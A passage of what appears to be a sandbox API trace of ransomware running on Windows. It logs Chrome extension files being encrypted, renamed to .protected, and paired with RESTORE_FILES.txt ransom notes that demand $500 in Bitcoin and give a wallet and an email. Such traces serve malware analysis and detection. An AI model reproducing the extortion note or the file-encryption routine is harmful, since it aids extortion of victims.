(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.952] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.952] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.952] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.952] CloseHandle (hObject=0x164) returned 1 [0078.952] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0078.952] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned 144 [0078.952] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0078.952] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0078.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*") returned 146 [0078.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\.") returned 146 [0078.952] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.953] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\..") returned 147 [0078.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.953] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.953] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.953] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.953] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.953] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.954] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.955] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.955] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.955] CloseHandle (hObject=0x168) returned 1 [0078.955] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.protected") returned 168 [0078.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0078.956] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.956] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.956] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0078.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.956] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.956] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.957] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.957] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.957] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.957] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.957] CloseHandle (hObject=0x164) returned 1 [0078.957] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned 141 [0078.958] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0078.958] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*") returned 143 [0078.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\.") returned 143 [0078.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.958] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\..") returned 144 [0078.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.958] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.958] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.958] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.959] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.960] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.960] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.961] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.961] CloseHandle (hObject=0x168) returned 1 [0078.961] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected") returned 165 [0078.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected")) returned 1 [0078.961] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.961] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.961] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0078.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.962] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.962] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.962] lstrlenA 